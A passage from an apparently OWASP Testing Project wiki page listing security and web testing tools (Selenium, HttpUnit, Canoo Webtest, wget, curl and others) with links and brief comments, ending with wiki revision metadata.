* Canoo Webtest - http://webtest.canoo.com/ - An XML based testing tool that provides a facade on top of htmlunit. No coding is necessary as the tests are completely specified in XML. There is the option of scripting some elements in Groovy if XML does not suffice. Very actively maintained.
* HttpUnit - http://httpunit.sourceforge.net/ - One of the first web testing frameworks, suffers from using the native JDK provided HTTP transport, which can be a bit limiting for security testing.
* Watij - http://watij.com - A Java implementation of WATIR. Windows only because it uses IE for it's tests (Mozilla integration is in the works).
* Solex - http://solex.sourceforge.net/ - An Eclipse plugin that provides a graphical tool to record HTTP sessions and make assertions based on the results.
* Selenium - http://www.openqa.org/selenium/ - JavaScript based testing framework, cross-platform and provides a GUI for creating tests. Mature and popular tool, but the use of JavaScript could hamper certain security tests.

==Other Tools==

===Runtime Analysis===

* Rational PurifyPlus - http://www-306.ibm.com/software/awdtools

===Binary Analysis===

* BugScam - http://sourceforge.net/projects/bugscam
* BugScan - http://www.hbgary.com

===Requirements Management===

* Rational Requisite Pro - http://www-306.ibm.com/software/awdtools/reqpro

'''Site Mirroring'''
* wget - http://www.gnu.org/software/wget, http://www.interlog.com/~tcharron/wgetwin.html
* curl - http://curl.haxx.se
* Sam Spade - http://www.samspade.org
* Xenu - http://home.snafu.de/tilman/xenulink.html

{{Category:OWASP Testing Project AoC}}

Italy

2006-12-14T19:51:41Z

Inquis:

Italy

2006-12-14T19:50:51Z

Inquis: